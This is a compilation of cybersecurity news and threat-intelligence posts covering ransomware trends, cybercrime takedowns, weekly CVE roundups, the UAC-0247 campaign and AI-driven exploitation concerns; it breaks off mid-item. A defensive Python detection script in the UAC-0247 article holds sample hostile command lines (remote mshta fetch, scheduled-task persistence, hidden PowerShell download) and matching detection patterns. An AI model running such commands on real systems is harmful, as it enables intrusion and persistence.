But the main concern is the next finding: "Second, we have uncovered a small number of customer accounts with evidence of prior compromise that is independent of and predates this incident, potentially as a result of social engineering, malware, or other methods." 

The company did not disclose who the attackers were, what the motive was, or the impact on customers, and is yet to respond to these queries from The Cyber Express. It only stated: "In both cases, we have notified the affected customers."

Meanwhile, Rauch said, Vercel had notified other suspected victims and encouraged them to rotate credentials and adopt best practices.

No Compromise of npm Packages

Reports of compromised npm packages have surfaced frequently in recent times. To cover that front, Vercel's security team, in collaboration with GitHub, Microsoft, npm, and Socket, confirmed that no npm packages published by Vercel had been compromised. "There is no evidence of tampering, and we believe the supply chain remains safe," the company said.

Threat Landscape March 2026: Ransomware Dominance, Access Brokers, Data Leaks, and Critical Exploitation Trends

Monthly Threat Landscape, March 2026

Cyble Research & Intelligence Labs (CRIL) in its monthly threat landscape analysis observed a highly active threat environment throughout March 2026, shaped by large-scale ransomware campaigns, persistent data breach activity, growing initial access brokerage markets, and exploitation of critical vulnerabilities affecting widely deployed enterprise systems.

Threat actors continued to prioritize financial extortion, credential access, and operational disruption, while increasingly targeting sectors rich in sensitive data or dependent on business continuity.

Quick Summary

Key threat trends identified during March 2026 include:

  • 702 ransomware attacks recorded globally.
  • 54 major data breach and leak incidents observed.
  • 20 compromised access sale listings tracked across cybercrime forums.
  • High concentration of attacks against Professional Services, Manufacturing, Retail, and Government sectors.
  • Continued exploitation of vulnerabilities listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog.

Fig 1. Cyber incidents recorded in March 2026 (Data Source: Cyble Blaze AI)

These trends indicate a mature cybercriminal ecosystem where access brokers, ransomware operators, and data leak actors increasingly operate in parallel.

Ransomware Activity Remained the Dominant Threat

CRIL recorded 702 ransomware attacks worldwide in March 2026, reflecting sustained aggression from both established groups and emerging operators.

Top Ransomware Groups

Qilin, Akira, The Gentlemen, Dragonforce, and INC Ransom were the top five most active ransomware actors in March 2026.

Fig 2. Top five ransomware actors (Data Source: Cyble Blaze AI)

Together, the top five groups accounted for more than 56% of observed ransomware activity, highlighting strong operational scale and affiliate ecosystems.

Most Targeted Industries

Construction, Professional Services, Manufacturing, Healthcare, and Energy & Utilities were the most targeted sectors by ransomware actors in March 2026.

Fig 3. Top 10 industry-wise attacks by ransomware actors (Data Source: Cyble Blaze AI)

Threat actors continued using data theft combined with operational disruption as a dual-extortion pressure tactic.

In the country-wise split, the United States remained the focal point amid ongoing geopolitical tensions with Iran.

Fig 4. Top 10 country-wise attacks by ransomware actors (Data Source: Cyble Blaze AI)

Compromised Access Market Expanded

CRIL tracked 20 distinct incidents involving the sale of unauthorized network access on underground forums.

Most Targeted Sectors

  • Professional Services – 25%
  • Retail – 20%
  • IT & ITES
  • Manufacturing

Fig 5. Sector-wise compromised accesses recorded (Data Source: Cyble Blaze AI)

Leading Access Sellers

A small group of actors dominated this market:

  • vexin
  • holyduxy
  • algoyim

These three actors were responsible for over 55% of observed access listings.

This reinforces the role of access brokers as upstream enablers for ransomware, espionage, and fraud operations.

Data Breaches and Leak Markets Remained Active

CRIL observed 54 significant breach and leak incidents during the month.

Most Targeted Sectors

  • Government & Law Enforcement
  • Retail
  • Technology

Fig 6. Sector-wise data breaches and leaks recorded (Data Source: Cyble Blaze AI)

Notable Incidents

Hospitality Holdings – Threat Actor Claimed 5TB Leak

Threat actor “nightly” claimed theft of over 5TB of data, including biometric records, CCTV footage, and financial documents.

South African Government Dataset for Sale

Threat actor XP95 advertised 3.8TB of allegedly stolen provincial government data.

Travel Data Leak

Over 95,000 travel-related records were reportedly exposed, including passports and payment data.

Exploited Vulnerabilities Accelerated Risk

March also saw active exploitation of critical vulnerabilities affecting enterprise technologies.

Notable KEV-listed vulnerabilities included:

  • CVE-2026-20131 – Cisco Secure Firewall Management Center
  • CVE-2025-53521 – F5 BIG-IP APM
  • CVE-2026-20963 – Microsoft SharePoint Server
  • CVE-2026-33017 – Langflow AI
  • CVE-2021-22681 – Rockwell Automation ICS

Key Trend

Attackers exploited both:

  • Newly disclosed zero-days
  • Legacy vulnerabilities from prior years

This points to widespread failures in patch management and exposure reduction.

Emerging Strategic Threat Developments

AI-Augmented Offensive Operations

Threat actors reportedly used CyberStrikeAI, an open-source AI-native security testing framework, in attacks against Fortinet FortiGate devices across 55 countries, compromising more than 600 appliances.

Supply Chain Malware via npm

North Korean actors were linked to 26 malicious npm packages distributing RAT malware through Pastebin/Vercel-based infrastructure.

Geopolitical Cyber Risk

Iran-linked cyber operations were assessed as likely to increase following regional tensions, with potential ransomware and hacktivist targeting across the Middle East.

Industries Facing Highest Risk

Based on March activity, organizations in the following sectors faced elevated risk:

  • Professional Services
  • Government
  • Manufacturing
  • Retail
  • Healthcare
  • Critical Infrastructure
  • Transportation & Logistics

These sectors hold valuable data, have high uptime requirements, or depend on complex supply chains.

Conclusion

The March 2026 threat landscape was defined by scale, specialization, and speed.

Threat actors increasingly leveraged:

  • Access brokerage markets
  • High-volume ransomware operations
  • Large-scale data theft
  • Rapid weaponization of critical vulnerabilities
  • AI-enhanced offensive tooling

The combination of concentrated criminal ecosystems and widespread enterprise exposure creates a sustained high-risk environment for organizations globally.

Key Recommendations

  • Prioritize remediation of KEV-listed vulnerabilities
  • Strengthen identity security and MFA across remote access platforms
  • Monitor for exposed credentials and access sale activity
  • Segment critical networks to reduce lateral movement
  • Conduct tabletop exercises for ransomware response
  • Improve backup resilience and recovery testing
  • Monitor software supply chain ecosystems
  • Expand threat intelligence coverage across dark web and leak forums

Cyble’s threat intelligence, ransomware monitoring, vulnerability intelligence, and attack surface management solutions help organizations proactively identify risks, prioritize remediation, and defend against evolving global threats.


The post Threat Landscape March 2026: Ransomware Dominance, Access Brokers, Data Leaks, and Critical Exploitation Trends appeared first on Cyble.

Indian Agency Arrests Key SIM Card Supplier of a Broader Cyber Fraud Network

CBI, Cyber Fraud Network, Chakra-V, SIM Card, Operation Chakra, Covid-19, Fraud

India’s top intelligence agency arrested a suspected key conspirator accused of supplying fraudulently obtained SIM cards to cybercriminal networks, as part of the agency’s ongoing anti-cybercrime initiative, Operation Chakra-V.

According to the Central Bureau of Investigation (CBI), the suspect was apprehended in the northeastern city of Guwahati after allegedly evading authorities since August 2025. Investigators say the accused played a central role in procuring and distributing illegally issued mobile SIM cards that were later used in a range of cyber-enabled fraud schemes.

Also read: CBI Files Chargesheet Against 30 Including Two Chinese Nationals in ₹1,000 Cr Cyber Fraud Network

Law enforcement agencies are now increasingly focusing on the infrastructure that enables digital crime rather than only on the individuals carrying out the scams. Fraudulently acquired SIM cards are a valuable tool for cybercriminals because they can be used to create anonymous accounts, bypass identity checks, receive one-time passwords (OTPs), and operate scam call centers with reduced traceability.

The CBI said its broader investigation uncovered a network involving Point of Sale (POS) agents who allegedly issued SIM cards using fake or improperly verified customer identities. These SIM cards were then reportedly supplied to criminals linked to fake “digital arrest” extortion scams, fraudulent loan offers, and investment fraud operations.

Authorities stated that searches were previously conducted at around 45 locations across eight Indian states, resulting in the arrest of 10 accused POS agents. The latest suspect is believed to have acted as an aggregator within the network.

Also read: India Dismantles ‘Phishing SMS Factory’ Infrastructure Sending Lakhs of Fraud Messages Daily

Investigators allege the accused transferred nearly ₹67 lakh through multiple bank accounts to procure approximately 10,000 illegally issued SIM cards. Evidence related to courier shipments used for distributing the cards has also reportedly been recovered, suggesting a structured logistics chain behind the operation.

From a cybersecurity perspective, the case underscores how telecom identity abuse remains a critical threat vector. Even sophisticated fraud campaigns often depend on simple enablers such as fraudulent SIM issuance, mule bank accounts, and compromised identity records.

The CBI said investigations into additional conspirators are ongoing. As cyber fraud grows more industrialized, dismantling support networks like these may prove just as important as arresting the scammers who interact directly with victims.

Also read: 12 Lakh SIM Cards Cancelled, over 3 Lakh IMEI Numbers Blocked as Centre Intensifies Crackdown on Cybercrime

75,000 DDoS-for-Hire Users Reprimanded as Authorities Seize Dozens of Domains

DDoS-for-Hire, Operation PowerOFF, Europol, U.S. Department of Justice

Law enforcement agencies across Europe, the United States, and other partner nations cracked down on the commercial DDoS-for-hire ecosystem, targeting both operators and customers of services used to knock websites offline.

The coordinated effort led to the seizure of 53 domains, four arrests, 25 search warrants, and warning notices sent to more than 75,000 people suspected of using so-called “booter” or “stresser” platforms.

A Crackdown on DDoS-for-Hire

DDoS-for-hire platforms allow customers to pay relatively small fees to launch distributed denial-of-service attacks against websites, gaming services, businesses, and public infrastructure. In fact, AI-driven threat intelligence company Cyble said in a new research report released today that DDoS was the primary mode of attack during the ongoing Iran-Israel and U.S. conflict. Cyble recorded a 140% increase in DDoS attacks targeting Israeli entities after September 2025, and at the height of the conflict saw 40 DDoS attacks per day.

These DDoS-for-hire services often market themselves as legitimate stress-testing tools, but authorities say they are widely abused for harassment, extortion, and disruption.

The latest enforcement wave is part of the long-running international initiative known as "Operation PowerOFF," which has previously dismantled multiple booter services and disrupted related infrastructure.

Read: DDoS-for-Hire Empire Dismantled as Poland Arrests Four, U.S. Seizes Nine Domains

U.S. Authorities Seize Key Infrastructure

The U.S. Department of Justice said investigators in Alaska seized infrastructure linked to eight DDoS-for-hire domains, including services branded as Vac Stresser and Mythical Stress, both of which allegedly advertised the ability to launch tens of thousands of attacks per day. Investigators also searched backend servers tied to the platforms.

Officials did not immediately identify those behind the services, but said the action was intended to disrupt the technical backbone used to power attacks globally.

75,000 Users Contacted Directly

In one of the more unusual aspects of the operation, authorities contacted more than 75,000 suspected users directly through warning emails and letters.

Law enforcement agencies appear to be using deterrence alongside takedowns—sending a message that paying for DDoS attacks leaves a trail and may bring legal consequences.

Security experts say the tactic could be particularly effective against younger or low-level offenders who use these platforms for gaming disputes, personal retaliation, or vandalism without fully understanding the legal risks.

Investigators said they identified around three million criminal accounts connected to the wider DDoS-for-hire ecosystem. The sheer number of accounts shows how industrialized cybercrime services have become. Instead of building botnets or malware, users can simply rent attack capability on demand.

DDoS attacks overwhelm a target with traffic, often causing websites, applications, or networks to crash. While sometimes dismissed as nuisance attacks, they can disrupt hospitals, financial institutions, government portals, and emergency services.

Recent years have also seen DDoS attacks used as smokescreens to distract security teams while other intrusions unfold.

Read: Europol Issues Public Alert: ‘We Will Never Call You’ as Phone and App Scams Surge

A Persistent Cat-and-Mouse Game

Despite repeated takedowns, booter services often reappear quickly under new names, new domains, or relocated hosting providers. Researchers have found that while seizures can significantly reduce traffic in the short term, the market has proven resilient over time.

That means operations like PowerOFF may need to combine arrests, infrastructure seizures, financial disruption, and user deterrence to have lasting impact.

The Week in Vulnerabilities: Azure AI, Spring AI, Fortinet, and Critical ICS Exposure

Weekly Vulnerability Report, Cyble Weekly Vulnerability Report, Vulnerability Intelligence, Vulnerability Management

Cyble Research & Intelligence Labs (CRIL) in its weekly vulnerability report tracked 1,431 bugs last week.

Of these, over 270 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly accelerating exploitation timelines and increasing real-world attack likelihood.

Additionally, 3 vulnerabilities were actively discussed across underground forums, signaling strong adversarial interest and rapid weaponization.

A total of 130 vulnerabilities were rated critical under CVSS v3.1, while 45 were rated critical under CVSS v4.0, reflecting the severity of disclosed issues.

Furthermore, CISA added 3 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild.

On the industrial front, CISA issued 5 ICS advisories covering 6 vulnerabilities, impacting vendors such as Siemens, Hitachi Energy, and Yokogawa.

Weekly Vulnerability Report’s Top 5 Vulnerabilities

CVE-2026-32213 — Microsoft Azure AI Foundry (Critical)

CVE-2026-32213 is a critical authorization bypass vulnerability in Microsoft Azure AI Foundry.

The flaw exists in the platform’s authorization logic, allowing unauthenticated attackers to bypass security checks and grant themselves administrative privileges. Successful exploitation enables full control over AI environments and associated resources.

CVE-2026-35022 — Claude Code CLI / Agent SDK (Critical)

CVE-2026-35022 is a critical OS command injection vulnerability affecting Anthropic’s Claude Code CLI and Agent SDK.

The vulnerability allows attackers to inject malicious commands into development workflows, resulting in remote code execution and potential compromise of AI pipelines.

CVE-2026-22738 — Spring AI (Critical)

CVE-2026-22738 is a remote code execution vulnerability in Spring AI caused by improper input sanitization in expression evaluation.

Attackers can inject malicious expressions that are executed by the Spring Expression Language, leading to complete application and server compromise.

CVE-2026-4631 — Cockpit (Critical)

CVE-2026-4631 is an unauthenticated remote code execution vulnerability in Cockpit, a web-based Linux server management interface.

The flaw allows attackers to execute arbitrary commands without authentication, potentially leading to full system takeover in enterprise environments.

CVE-2026-35616 — Fortinet FortiClient EMS (Critical)

CVE-2026-35616 is a critical authentication bypass vulnerability in Fortinet FortiClient EMS.

Attackers can bypass authentication and execute arbitrary commands, leading to complete compromise of endpoint management systems.

Data Source: Cyble Vision

Vulnerabilities Added to CISA KEV

CISA continues to expand its KEV catalog, reflecting real-world exploitation trends.

Notable addition:

CVE-2026-35616 — Fortinet FortiClient EMS
This vulnerability enables authentication bypass and remote command execution, making it a high-priority remediation target.

The inclusion of enterprise security tools in KEV highlights attackers’ focus on compromising centralized management systems.

Critical ICS Vulnerabilities

CISA issued 5 ICS advisories covering 6 vulnerabilities, many of which impact critical infrastructure environments.

Data Source: Cyble Vision

CVE-2026-1579 — PX4 Autopilot (Critical)

A missing authentication vulnerability allowing attackers to execute critical functions without credentials.

This flaw poses risks to autonomous and unmanned systems, potentially enabling unauthorized control.

CVE-2026-3356 — Anritsu Systems (Critical)

This vulnerability involves missing authentication in Anritsu devices, allowing attackers to gain unauthorized access.

CVE-2025-10492 — Hitachi Energy Ellipse (Critical)

A deserialization vulnerability enabling attackers to execute arbitrary code within industrial systems.

Siemens SICAM 8 (Chained Risk)

Two vulnerabilities affecting Siemens SICAM 8 systems—resource exhaustion and out-of-bounds write—can be chained together.

This creates a denial-of-service risk capable of disrupting industrial processes and operational visibility.

CVE-2025-7741 — Yokogawa CENTUM VP (Medium)

A hard-coded password vulnerability that weakens authentication mechanisms and increases risk of unauthorized access.

Critical Infrastructure Sectors Spotlight

Data Source: Cyble Vision

Analysis indicates:

  • Critical Manufacturing appears in 66.7% of vulnerabilities
  • Cross-sector exposure spans:
    • Transportation Systems
    • Emergency Services
    • Defense Industrial Base
    • Communications

This highlights interconnected infrastructure risks, where a single vulnerability can cascade across multiple sectors.

Conclusion

This week’s findings highlight several critical trends:

  • Expansion of vulnerabilities into AI and development ecosystems
  • Increasing exploitation of enterprise management platforms
  • Continued weaknesses in industrial control systems
  • Cross-sector risk amplification in critical infrastructure

With 270+ PoCs, KEV-confirmed exploitation, and emerging threats in AI frameworks, organizations face heightened risk across both digital and physical environments.

Key Recommendations

  • Prioritize vulnerabilities with PoCs and KEV inclusion
  • Secure AI development environments and pipelines
  • Patch enterprise management and remote access systems immediately
  • Implement strict authentication and access control mechanisms
  • Segment IT and OT networks to prevent lateral movement
  • Apply compensating controls for unpatched ICS vulnerabilities
  • Monitor underground forums and threat intelligence feeds
  • Conduct continuous vulnerability assessments and penetration testing


Cyble’s attack surface management and vulnerability intelligence solutions help organizations proactively identify risks, prioritize remediation, and detect emerging threats. By integrating intelligence-driven security strategies, organizations can strengthen resilience across enterprise and critical infrastructure environments.

The post The Week in Vulnerabilities: Azure AI, Spring AI, Fortinet, and Critical ICS Exposure appeared first on Cyble.

Ukraine Warns of Surge in Cyberattacks on Hospitals, Local Governments by UAC-0247 Hackers

UAC-0247, CERT-UA, Ukrainian IP Addresses, IP Addresses, Digital Assets, Russia, Ukraine

Ukrainian cyber defenders reported a newly intensified cyber campaign that is targeting Ukraine’s healthcare system and local government agencies, with attackers deploying increasingly sophisticated malware and social engineering tactics.

In a fresh advisory, the CERT-UA said the activity—linked to a threat cluster tracked as UAC-0247—spiked between March and April 2026, with clinical hospitals, emergency services, and municipal bodies bearing the brunt of the attacks.

UAC-0247 Used Humanitarian Aid Lures as Entry Point

The campaign begins with phishing emails disguised as offers of humanitarian assistance—a tactic designed to exploit trust during wartime conditions. Victims are urged to click on links that appear legitimate, sometimes backed by convincingly crafted fake websites or compromised third-party resources.

Behind the scenes, however, the links trigger a multi-stage infection chain that ultimately gives attackers remote control over the victim’s system.

Once the link is clicked, victims download an archive containing a malicious shortcut file. This file activates a built-in Windows tool to execute remote code, initiating a sequence that includes decoy documents to avoid suspicion.

Also read: Hackers Impersonate Ukrainian CERT to Plant a RAT on Government, Hospital Networks

The attack escalates quickly. Malicious executables are deployed via scheduled tasks, injecting code into legitimate system processes such as RuntimeBroker.exe to evade detection.

Recent campaigns show an evolution in sophistication, with attackers introducing multi-stage loaders and custom executable formats. Payloads are often encrypted and compressed, making analysis and detection more difficult.

At later stages, attackers deploy reverse shell tools—including variants resembling “RAVENSHELL”—to establish encrypted communication with command-and-control servers and execute remote commands.

Persistent Access and Remote Control

To maintain long-term access, attackers install a custom backdoor known as AGINGFLY, a C#-based malware designed for full remote system control. The tool enables:

  • Command execution
  • File exfiltration
  • Screenshot capture
  • Keylogging

Unlike conventional malware, AGINGFLY dynamically retrieves and compiles its command logic from remote servers, making it more adaptable and harder to detect.

Complementing this is a PowerShell-based tool dubbed SILENTLOOP, which helps maintain persistence and retrieves command server addresses—sometimes even pulling them from Telegram channels.

Credential Theft and Lateral Movement

Once inside a network, attackers move quickly to expand access. CERT-UA observed tools like CHROMELEVATOR being used to extract browser credentials, while ZAPIXDESK targets WhatsApp data.

The attackers also conduct internal reconnaissance using both custom scripts and publicly available tools such as RUSTSCAN. For stealthy movement across networks, tunneling tools like LIGOLO-NG and CHISEL are deployed.

In at least one case, attackers went further—embedding the XMRIG cryptocurrency miner inside a modified version of the legitimate WireGuard application, highlighting a secondary motive of financial gain.

Military Targets Also in Scope

The campaign isn’t limited to civilian infrastructure. CERT-UA noted an incident in March where individuals connected to Ukraine’s defense sector were targeted via the Signal platform.

Attackers distributed a trojanized version of software used by FPV drone operators, packaged as a seemingly legitimate update. In reality, the download triggered a DLL side-loading attack that installed the AGINGFLY backdoor.

CERT-UA recommends reducing exposure by restricting the execution of high-risk file types such as LNK, HTA, and JavaScript files. The agency also urges organizations to limit the use of native Windows tools like mshta.exe and PowerShell where possible, as these are frequently abused in attacks.
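The chain described above (shortcut to mshta.exe, scheduled-task persistence, an oddly parented RuntimeBroker.exe, PowerShell resolving its server address from Telegram) leaves process-creation telemetry that a SOC can score per host. The following is an added illustration, not CERT-UA's detection content; the events are constructed in a simplified Sysmon Event ID 1 style, and the field names, parent-process assumptions and rule thresholds are assumptions.

```python
"""Score Windows process-creation events for the UAC-0247 chain described
above: an LNK launching mshta.exe, scheduled-task persistence, an abnormally
parented RuntimeBroker.exe, and PowerShell fetching its C2 address remotely.

Added example for illustration, not CERT-UA's own detection content. Events
are constructed in a simplified Sysmon Event ID 1 style; the field names,
rule thresholds and sample command lines are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str          # full path of the newly created process
    parent_image: str   # full path of its parent
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Assumption: on a healthy host RuntimeBroker.exe is started by svchost.exe (DCOM).
NORMAL_RUNTIMEBROKER_PARENTS = {"svchost.exe"}
# Directories a standard user can write to; a scheduled task pointing here is suspect.
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")
# Parents that indicate a user double-clicked a shortcut, possibly straight from an archive.
SHORTCUT_LAUNCHERS = {"explorer.exe", "7zfm.exe", "winrar.exe"}


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every chain stage this single event matches."""
    img, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.cmdline.lower()
    hits: List[str] = []
    # Stage 1: shortcut in an archive runs mshta.exe, which pulls remote HTA content.
    if img == "mshta.exe" and parent in SHORTCUT_LAUNCHERS:
        hits.append("lnk_to_mshta")
    if img == "mshta.exe" and ("http://" in cmd or "https://" in cmd or ".hta" in cmd):
        hits.append("mshta_remote_content")
    # Stage 2: persistence via a scheduled task whose action lives in a user-writable path.
    if img == "schtasks.exe" and "/create" in cmd and any(h in cmd for h in USER_WRITABLE_HINTS):
        hits.append("schtasks_user_writable_payload")
    # Stage 3: RuntimeBroker.exe with an unexpected parent. This catches hollowing of a
    # freshly spawned copy; injection into an existing one needs Sysmon Event ID 8/10 instead.
    if img == "runtimebroker.exe" and parent not in NORMAL_RUNTIMEBROKER_PARENTS:
        hits.append("runtimebroker_abnormal_parent")
    # Stage 4: PowerShell resolving a C2 address from a remote source such as a Telegram channel.
    if img in {"powershell.exe", "pwsh.exe"} and (
            "t.me/" in cmd or "telegram" in cmd or "downloadstring" in cmd):
        hits.append("powershell_remote_c2_lookup")
    return hits


def triage(events: List[ProcEvent], min_stages: int = 2) -> Dict[str, List[str]]:
    """Group stage hits per host and return hosts showing at least `min_stages`
    distinct stages: one LOLBin hit alone is noisy, but several stages of the
    same chain on one host are a strong signal."""
    per_host: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        per_host[ev.host].update(classify(ev))
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= min_stages}


# Constructed sample events: WS1 shows the full chain, WS2 shows benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent("WS1", r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta.exe https://example.invalid/aid/help.hta"),
    ProcEvent("WS1", r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\mshta.exe",
              r"schtasks.exe /create /tn Updater /sc minute /mo 10 /tr C:\Users\u\AppData\Roaming\upd.exe"),
    ProcEvent("WS1", r"C:\Windows\System32\RuntimeBroker.exe", r"C:\Users\u\AppData\Roaming\upd.exe",
              "RuntimeBroker.exe -Embedding"),
    ProcEvent("WS1", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\u\AppData\Roaming\upd.exe",
              "powershell.exe -w hidden -c (iwr https://t.me/s/example_channel).Content"),
    ProcEvent("WS2", r"C:\Windows\System32\RuntimeBroker.exe", r"C:\Windows\System32\svchost.exe",
              "RuntimeBroker.exe -Embedding"),
    ProcEvent("WS2", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell.exe Get-ChildItem C:\\Logs"),
]

if __name__ == "__main__":
    for host, stages in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {len(stages)} chain stages -> isolate and collect: {', '.join(stages)}")
```

Pairing these process rules with the CERT-UA hardening above (blocking LNK/HTA/JS execution and constraining mshta.exe and PowerShell) removes most of the chain's first two stages outright, leaving the rules to catch what slips through.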

Goldman Sachs ‘Hyperaware’ of AI Risks; Working with Anthropic on Mythos

Goldman Sachs, AI Risks, AI-driven Risks, Mythos, Anthropic, David Solomon

Goldman Sachs is taking a cautious approach toward a new artificial intelligence model from Anthropic, warning that its advanced capabilities could introduce significant cybersecurity risks—even as the bank explores its long-term potential.

The model, known as "Mythos," has sparked concern across the financial sector due to its ability to identify and exploit software vulnerabilities at a level that could reshape both cyber defense and cybercrime.

“Hyperaware” of AI-Driven Cyber Risks

Answering a query during a recent earnings call, Goldman Sachs CEO David Solomon said the bank is closely monitoring the risks associated with emerging AI systems including LLMs and the disruptive Mythos model from Anthropic.

“We’re hyperaware,” Solomon said, referring to the cybersecurity implications of next-generation AI tools.

He added that Goldman is actively working with Anthropic and cybersecurity partners to better understand how such models could impact financial systems and cyber defenses.

"Cybersecurity has long been at the core of our business. And we have, for a very, very long time, put enormous resources forward," Solomon added.

"With the help of the US government and the model publishers, we are very focused on supplementing our cyber and infrastructure resilience," he said. "And this is part of our ongoing capabilities that we have been investing in and are accelerating our investment in."

The comments reflect the current mindset of major financial institutions, which are increasingly treating advanced AI not just as a productivity tool, but as a potential security disruptor.

Also read: AI Legal Risks: Lisa Fitzgerald on Why Businesses Must Vet AI Use Cases

Why Mythos is Raising Concerns

Unlike earlier AI systems, Mythos is designed to autonomously discover and exploit vulnerabilities in software environments. Anthropic has acknowledged that the model can “find and exploit sophisticated vulnerabilities” and, in some cases, outperform human experts.

This capability has triggered concern in the cybersecurity community, where opinions are divided but many warn that such tools could lower the barrier for cyberattacks. In practical terms, even individuals without deep technical expertise could potentially use AI to identify weaknesses in operating systems, applications, or enterprise infrastructure.

Anthropic itself has taken an unusually cautious stance. The company has restricted access to Mythos and opted not to release it publicly, citing fears of misuse.

Instead, the model is being shared as a preview with 11 organizations under a controlled initiative dubbed "Project Glasswing." The organizations include JPMorgan, Apple, Google, Microsoft, Nvidia and Goldman Sachs, among others. The initiative aims to strengthen defenses before any wider deployment.

Financial Sector on High Alert

The concerns are not limited to Goldman Sachs. Discussions involving top U.S. financial leaders—including regulators and central banking officials—have reportedly taken place to assess the risks posed by such AI systems.

Banks are particularly vulnerable due to their complex mix of modern and legacy systems, which could provide fertile ground for AI-driven vulnerability discovery and exploitation.

At the same time, industry leaders see a double-edged reality: while attackers could benefit first, defenders may eventually use similar tools to identify and patch weaknesses faster.

Balancing Risk and Opportunity

Despite the warnings, Solomon struck a measured tone about the future of AI in business. He noted that the technology has the potential to significantly improve efficiency and transform operations across industries.

"Whenever you have acceleration of your technology, there are going to be bumps, and there are going to be risk issues," Solomon said, answering a separate query during the call. "But the power of the technology, the ability to use it in an enterprise, to remake processes, to create efficiency, and also create more capacity to invest the growth — I can't find a CEO that's not talking about that."

This tension—between innovation and risk—sits at the center of the current debate around advanced AI systems like Mythos.

A Turning Point for Cybersecurity

The emergence of models capable of autonomously identifying and exploiting vulnerabilities marks a potential inflection point for cybersecurity.

Experts suggest that the rapid evolution of AI could accelerate both offensive and defensive capabilities, creating a race between attackers and defenders. In the short term, however, the concern is that powerful tools may be easier to weaponize than to secure.

For financial institutions like Goldman Sachs, however, the strategy seems to be to engage early, understand the risks, and prepare defenses before such technologies become widely accessible.

Authorities Dismantle ‘W3LL’ Phishing Empire Powering Global Business Email Attacks

W3LL Phishing, W3LL Phishing Kit, W3LL Store

An international operation, coordinated between the FBI Atlanta Field Office and Indonesian law enforcement agencies, has led to the takedown of a major phishing infrastructure that enabled cybercriminals worldwide to steal credentials and attempt fraud exceeding $20 million.

The crackdown targeted a cybercrime ecosystem built around the “W3LL phishing kit,” a tool designed to replicate legitimate login pages and harvest user credentials at scale. Authorities say the platform allowed attackers to compromise thousands of accounts and carry out widespread financial fraud.

More Than a Phishing Tool

Investigators describe W3LL not as a single piece of malware, but as a fully developed “phishing-as-a-service” operation. For a relatively low cost of around $500, cybercriminals could purchase access to the kit and launch highly convincing phishing campaigns with minimal technical expertise.

The service was supported by an underground marketplace known as W3LLSTORE, where stolen credentials were bought and sold. Between 2019 and 2023, more than 25,000 compromised accounts were traded through the platform.

Even after the marketplace was shut down, the operation continued through private and encrypted channels, allowing it to evolve and remain active.


Built for Corporate Account Takeovers

According to research by Group-IB, the W3LL ecosystem was specifically designed to target corporate environments, particularly business email systems such as Microsoft 365.

The toolkit included a range of capabilities beyond simple phishing pages, forming an end-to-end attack chain. These included tools for:

  • Sending large-scale phishing emails
  • Harvesting and validating email accounts
  • Hosting malicious infrastructure
  • Managing stolen credentials

Group-IB estimates that around 500 threat actors were actively using W3LL tools, turning the platform into a structured cybercrime network rather than a loose collection of attackers.

Bypassing Multi-Factor Authentication

One of the most dangerous aspects of the W3LL kit was its use of adversary-in-the-middle (AitM) techniques. This allowed attackers to intercept login sessions in real time, capturing not just usernames and passwords but also authentication tokens.

As a result, even accounts protected by multi-factor authentication (MFA) could be compromised, giving attackers persistent access to corporate systems.

Security researchers say this capability made W3LL particularly effective in business email compromise (BEC) attacks—one of the most financially damaging forms of cybercrime today.

Global Scale and Impact

The phishing kit was used in attacks targeting organizations across multiple industries, including finance, healthcare, manufacturing, and IT services.

Data suggests that tens of thousands of corporate accounts were targeted globally, with a significant concentration of victims in the United States, followed by Europe and Australia.

Between 2023 and 2024 alone, the infrastructure was linked to more than 17,000 phishing attempts worldwide.

Arrest and Infrastructure Seizure

As part of the operation, authorities seized domains and infrastructure used to distribute the phishing kit and facilitate credential theft. Indonesian police also detained the suspected developer behind the platform, identified only as “G.L.”

Officials say this marks a significant step in targeting not just users of cybercrime tools, but the developers who enable large-scale attacks.

The Week in Vulnerabilities: OpenClaw, FreeBSD, F5 BIG-IP, and Critical ICS Bugs

Weekly Vulnerability Report

Cyble Research & Intelligence Labs' (CRIL) weekly vulnerability report tracked 1,960 vulnerabilities last week, reflecting a continued surge in vulnerability disclosures across enterprise and cloud ecosystems.

Of these, 248 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly increasing the likelihood of real-world attacks and accelerating exploitation timelines.

Additionally, at least 5 vulnerabilities were actively discussed across underground forums, indicating strong attacker interest and rapid weaponization.

A total of 214 vulnerabilities were rated critical under CVSS v3.1, while 57 were rated critical under CVSS v4.0.

Furthermore, CISA added 4 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild.

On the industrial side, CISA issued 7 ICS advisories covering 10 vulnerabilities, impacting vendors such as Schneider Electric, WAGO, and PTC.

Weekly Vulnerability Report's Top 5 CVEs

CVE-2026-32917 — OpenClaw (Critical)

CVE-2026-32917 is a critical remote command injection vulnerability affecting OpenClaw, an AI agent framework.

The flaw occurs in the iMessage attachment staging workflow, allowing attackers to inject commands into remote systems. Successful exploitation enables arbitrary command execution, potentially leading to full system compromise.

CVE-2026-4747 — FreeBSD RPCSEC_GSS (Critical)

CVE-2026-4747 is a critical stack-based buffer overflow vulnerability in FreeBSD caused by improper bounds checking in packet handling.

Attackers can send specially crafted requests to trigger a stack overflow, resulting in remote code execution with kernel-level privileges, enabling full system takeover.

CVE-2026-31883 — FreeRDP (Critical)

CVE-2026-31883 is a heap-based buffer overflow vulnerability in FreeRDP’s audio decoding components.

